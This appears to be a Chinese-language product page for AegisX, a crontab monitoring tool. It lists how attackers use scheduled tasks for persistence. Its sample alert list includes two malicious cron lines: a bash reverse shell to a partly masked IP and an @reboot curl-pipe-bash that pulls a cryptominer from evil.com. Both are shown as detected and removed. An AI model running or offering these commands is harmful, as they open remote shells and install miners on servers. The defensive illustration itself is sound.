实时监控Linux计划任务(Crontab)的异常变动,防止攻击者利用定时任务实现持久化驻留、反弹Shell和挖矿程序植入
攻击者获得服务器权限后,第一件事往往就是植入定时任务
每5分钟自动向C2服务器发起反向连接,即使Shell被杀也能自动恢复
利用Cron定时拉取并启动挖矿程序,并设置守护进程防止被kill
定时打包敏感数据并通过DNS隧道或HTTPS外传到攻击者服务器
定时检测后门是否被清除,如被清除则自动重新下载部署
定时检查并恢复攻击者的SSH公钥到authorized_keys文件
利用Cron将服务器加入僵尸网络,定时执行DDoS攻击指令
*/10 * * * * logrotate最后执行: 2026-07-30 10:20 · 用户: root · 来源: 系统内置
0 3 * * * certbot renew最后执行: 2026-07-30 03:00 · 用户: root · 来源: certbot
*/5 * * * * bash -c 'bash -i >& /dev/tcp/45.x.x.187/4444 0>&1'检测时间: 2026-07-30 09:15 · 用户: www-data · 已自动禁用
@reboot curl -s hxxp://evil.com/xmrig | bash检测时间: 2026-07-29 22:40 · 用户: nobody · 已自动清除
0 2 * * * /opt/backup_db.sh最后执行: 2026-07-30 02:00 · 用户: backup · 白名单
AegisX 7×24监控所有计划任务变动,第一时间发现持久化攻击